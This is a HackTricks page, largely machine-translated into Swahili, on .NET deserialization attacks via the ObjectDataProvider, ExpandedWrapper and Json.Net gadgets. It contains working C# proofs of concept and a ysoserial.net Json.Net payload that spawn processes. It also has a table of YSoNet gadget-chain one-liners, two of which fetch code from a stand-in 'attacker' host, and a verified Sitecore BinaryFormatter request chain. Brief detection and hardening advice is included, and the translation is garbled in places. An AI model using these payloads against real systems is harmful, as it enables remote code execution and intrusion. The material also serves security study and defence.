HackTricksBasic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)
Reading time: 9 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Chapisho hili limetengwa kuelewa jinsi gadget ObjectDataProvider inavyotumika kupata RCE na jinsi maktaba za Serialization Json.Net na xmlSerializer zinavyoweza kutumiwa vibaya pamoja na gadget hiyo.
ObjectDataProvider Gadget
From the documentation: the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source.
Ndiyo, ni maelezo ya kushangaza, hivyo tuone nini darasa hili linao kinachovutia: Darasa hili huruhusu wrap an arbitrary object, kutumia MethodParameters kuweka vigezo vya aina yoyote, na kisha tumia MethodName kuitisha function yoyote ya object iliyotajwa kwa kutumia vigezo hivyo.
Kwa hivyo, object yoyote itatekeleza function yenye parameters wakati inatengenezwa upya (being deserialized).
Jinsi hii inawezekana
The System.Windows.Data namespace, found within the PresentationFramework.dll at C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF, is where the ObjectDataProvider is defined and implemented.
Using dnSpy you can inspect the code of the class we are interested in. In the image below we are seeing the code of PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name
.png)
Kama unavyoona, wakati MethodName inawekwa base.Refresh() inaitwa; tuchukulie tuangalie inafanya nini:
.png)
Sawa, tuendelee kuona this.BeginQuery() inafanya nini. BeginQuery imeoverride na ObjectDataProvider na hapa ndilo linachofanya:
.png)
Kumbuka mwishoni mwa msimbo inaita this.QueryWorke(null). Tazama inatekeleza nini wakati inaitwa:
.png)
Kumbuka hii si msimbo kamili wa function QueryWorker lakini inaonyesha sehemu ya kuvutia: Msimbo unaita this.InvokeMethodOnInstance(out ex); β hapa ndilo mstari ambapo method iliyowekwa inaitwa.
If you want to check that just setting the MethodName it will be executed, you can run this code:
using System.Windows.Data;
using System.Diagnostics;
namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ObjectDataProvider myODP = new ObjectDataProvider();
myODP.ObjectType = typeof(Process);
myODP.MethodParameters.Add("cmd.exe");
myODP.MethodParameters.Add("/c calc.exe");
myODP.MethodName = "Start";
}
}
}
Kumbuka kwamba unahitaji kuongeza kama reference C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll ili kupakia System.Windows.Data
ExpandedWrapper
Ukitegemea exploit iliyotangulia, kutatokea kesi ambapo the object itakayokuwa deserialized as mfano wa ObjectDataProvider (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, object ilideserializa kwa kutumia GetType). Kisha, haitakuwa na habari kuhusu aina ya object iliyofungwa ndani ya mfano wa ObjectDataProvider (kwa mfano Process). Unaweza kupata maelezo zaidi kuhusu DotNetNuke vuln hapa.
Class hii inaruhusu kuainisha aina za object za vitu vinavyofungwa katika instance fulani. Hivyo, class hii inaweza kutumika kufunga source object (ObjectDataProvider) ndani ya aina mpya ya object na kutoa properties tunazohitaji (ObjectDataProvider.MethodName na ObjectDataProvider.MethodParameters).
Hii ni muhimu sana kwa kesi kama ile iliyoonyeshwa hapo awali, kwa sababu tutakuwa na uwezo wa wrap ObjectDataProvider inside an ExpandedWrapper instance na when deserialized class hii itakuwa inafanya create object ya OjectDataProvider ambayo itaexecute function iliyoonyeshwa katika MethodName.
You can check this wrapper with the following code:
using System.Windows.Data;
using System.Diagnostics;
using System.Data.Services.Internal;
namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
myExpWrap.ProjectedProperty0.MethodName = "Start";
}
}
}
Json.Net
Katika official web page inaonyesha kwamba maktaba hii inaruhusu Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer. Kwa hiyo, ikiwa tunaweza deserialize the ObjectDataProvider gadget, tunaweza kusababisha RCE kwa ku-deserialize tu object.
Json.Net example
Kwanza kabisa tuchunguze mfano jinsi ya serialize/deserialize object kutumia maktaba hii:
using System;
using Newtonsoft.Json;
using System.Diagnostics;
using System.Collections.Generic;
namespace DeserializationTests
{
public class Account
{
public string Email { get; set; }
public bool Active { get; set; }
public DateTime CreatedDate { get; set; }
public IList<string> Roles { get; set; }
}
class Program
{
static void Main(string[] args)
{
Account account = new Account
{
Email = "james@example.com",
Active = true,
CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
Roles = new List<string>
{
"User",
"Admin"
}
};
//Serialize the object and print it
string json = JsonConvert.SerializeObject(account);
Console.WriteLine(json);
//{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}
//Deserialize it
Account desaccount = JsonConvert.DeserializeObject<Account>(json);
Console.WriteLine(desaccount.Email);
}
}
}
Kutumia vibaya Json.Net
Kutumia ysoserial.net nilitengeneza exploit:
yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
Katika msimbo huu unaweza jaribu exploit, endesha tu na utaona kwamba calc itaanzishwa:
using System;
using System.Text;
using Newtonsoft.Json;
namespace DeserializationTests
{
class Program
{
static void Main(string[] args)
{
//Declare exploit
string userdata = @"{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
//Exploit to base64
string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));
//Get data from base64
byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
//Deserialize data
string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
}
}
}
Mnyororo ya Gadget za Advanced .NET (YSoNet & ysoserial.net)
Mbinu ya ObjectDataProvider + ExpandedWrapper iliyotanguliwa hapo juu ni moja tu kati ya MNYA mnyororo za gadget zinazoweza kutumiwa wakati programu inafanya unsafe .NET deserialization. Zana za kisasa za red-team kama YSoNet (na ile ya zamani ysoserial.net) zinafanya otomatiki uundaji wa ready-to-use malicious object graphs kwa micolonyo mingi ya gadget na miundo ya serialization.
Hapo chini ni rejea iliyoshinikizwa ya mnyororo muhimu zaidi zinazotoka ndani ya YSoNet pamoja na ufafanuzi mfupi wa jinsi zinavyofanya kazi na mifano ya amri za kuunda payload.
| Gadget Chain | Wazo Kuu / Primitive | Serializers Za Kawaida | YSoNet one-liner |
|---|---|---|---|
| TypeConfuseDelegate | Inaharibu rekodi ya DelegateSerializationHolder ili, mara ikirejeshwa, delegate itamwelekeza kwenye method yoyote iliyotolewa na mshambuliaji (kwa mfano Process.Start) | BinaryFormatter, SoapFormatter, NetDataContractSerializer | ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin |
| ActivitySurrogateSelector | Inatumia vibaya System.Workflow.ComponentModel.ActivitySurrogateSelector ili kuipita type-filtering ya .NET β₯4.8 na kuitisha moja kwa moja constructor ya darasa lililotolewa au kucompile faili ya C# kwa wakati huo | BinaryFormatter, NetDataContractSerializer, LosFormatter | ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat |
| DataSetOldBehaviour | Inatumia uwakilishi wa XML wa zamani wa System.Data.DataSet kuanzisha aina yoyote kwa kujaza sehemu za <ColumnMapping> / <DataType> (kwa hiari kuiga assembly kwa --spoofedAssembly) | LosFormatter, BinaryFormatter, XmlSerializer | ysonet.exe DataSetOldBehaviour "<DataSet>β¦</DataSet>" --spoofedAssembly mscorlib > payload.xml |
| GetterCompilerResults | Kwa runtimes zilizo na WPF (> .NET 5) inachomeka getters za mali hadi kufikia System.CodeDom.Compiler.CompilerResults, kisha inacompile au inapakia DLL iliyotolewa na -c | Json.NET typeless, MessagePack typeless | ysonet.exe GetterCompilerResults -c Loader.dll > payload.json |
| ObjectDataProvider (review) | Inatumia WPF System.Windows.Data.ObjectDataProvider kuita method static yoyote yenye arguments zinazodhibiwa. YSoNet inaongeza chaguo la --xamlurl ili kuhost malicioius XAML kwa mbali | BinaryFormatter, Json.NET, XAML, etc. | ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml |
| PSObject (CVE-2017-8565) | Inaweka ScriptBlock ndani ya System.Management.Automation.PSObject ambalo linafanywa wakati PowerShell inadeserialise object | PowerShell remoting, BinaryFormatter | ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin |
tip
Payload zote huandikwa kwa stdout kwa chaguo-msingi, kufanya iwe rahisi kuzitumia kwa kupipa (pipe) kwenye zana nyingine (mfano ViewState generators, base64 encoders, HTTP clients).
Kujenga / Kuisakinisha YSoNet
Ikiwa hakuna binaries zilizojengwa tayari zinapatikana chini ya Actions β Artifacts / Releases, PowerShell one-liner ifuatayo itaweka mazingira ya kujenga, kukuza repository na kucompile kila kitu katika mode ya Release:
Set-ExecutionPolicy Bypass -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'));
choco install visualstudio2022community visualstudio2022-workload-nativedesktop msbuild.communitytasks nuget.commandline git --yes;
git clone https://github.com/irsdl/ysonet
cd ysonet
nuget restore ysonet.sln
msbuild ysonet.sln -p:Configuration=Release
The compiled ysonet.exe can then be found under ysonet/bin/Release/.
Ugundaji & Kuimarisha
- Gundua unexpected child processes of
w3wp.exe,PowerShell.exe, or any process deserialising user-supplied data (e.g.MessagePack,Json.NET). - Wezesha na lazimisha type-filtering (
TypeFilterLevel= Full, customSurrogateSelector,SerializationBinder, etc.) kila inapowezekana wakati legacyBinaryFormatter/NetDataContractSerializerhaziwezi kuondolewa. - Ambapo inawezekana hamisha kwenda
System.Text.JsonauDataContractJsonSerializerkwa converters zinazotegemea orodha ya kuruhusiwa. - Zuia WPF assemblies hatari (
PresentationFramework,System.Workflow.*) kupewa load katika web processes ambazo hazipaswi kuhitaji.
Mfano halisi wa sink: Sitecore convertToRuntimeHtml β BinaryFormatter
Sink ya vitendo ya .NET inayoweza kufikiwa katika mtiririko wa Sitecore XP Content Editor yenye uthibitisho:
- Sink API:
Sitecore.Convert.Base64ToObject(string)inafunikanew BinaryFormatter().Deserialize(...). - Njia ya kuanzisha: pipeline
convertToRuntimeHtmlβConvertWebControls, ambayo inatafuta kipengele jirani chenyeid="{iframeId}_inner"na inasoma attribute yavalueambayo inachukuliwa kama data iliyoseriwalishwa iliyofungwa kwa base64. Matokeo hubadilishwa kuwa string na kuyaingiza kwenye HTML.
Minimal endβtoβend (iliyothibitishwa):
// Load HTML into EditHtml session
POST /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.aspx
Content-Type: application/x-www-form-urlencoded
__PARAMETERS=edithtml:fix&...&ctl00$ctl00$ctl05$Html=
<html>
<iframe id="test" src="poc"></iframe>
<dummy id="test_inner" value="BASE64_BINARYFORMATTER"></dummy>
</html>
// Server returns a handle; visiting FixHtml.aspx?hdl=... triggers deserialization
GET /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=...
- Gadget: mnyororo wowote wa BinaryFormatter unaorejesha string (madhara ya pembeni yanaendeshwa wakati wa deserialization). Angalia YSoNet/ysoserial.net ili kuzalisha payloads.
Kwa mnyororo kamili unaoanza preβauth kwa HTML cache poisoning katika Sitecore na unaoelekeza kwa sink hii:
Marejeo
- YSoNet β .NET Deserialization Payload Generator
- ysoserial.net β original PoC tool
- Microsoft β CVE-2017-8565
- watchTowr Labs β Sitecore XP cache poisoning β RCE
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.